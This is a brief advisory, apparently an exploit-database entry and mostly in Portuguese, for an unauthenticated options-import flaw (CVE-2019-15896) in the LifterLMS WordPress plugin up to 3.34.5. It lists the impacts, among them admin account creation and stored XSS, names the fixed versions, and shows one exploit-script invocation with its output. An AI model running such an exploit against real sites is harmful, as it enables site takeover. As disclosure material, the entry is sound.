
LifterLMS <= 3.34.5 - Importação de Opções Não Autenticada
LifterLMS <= 3.34.5 - Importação de Opções Não Autenticada
Importação de Opções Não Autenticada, que pode levar a
Redirecionamento de Site
Criação de Conta de Administrador
Injeção de Conteúdo
XSS Armazenado
Os problemas foram relatados como corrigidos na versão 3.35.0. No entanto, a versão 3.35.1 adicionou sanitização e filtragem adicionais de entrada.
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected] LifterLMS <= 3.34.5 - Unauthenticated Options Import Exploit By Ramdom Robbie Once ran check your email for the forgotten password link. Password reset email sent to [email protected]
Informações
---
Requires access to login.php and working email address and the site needs to be able to send emails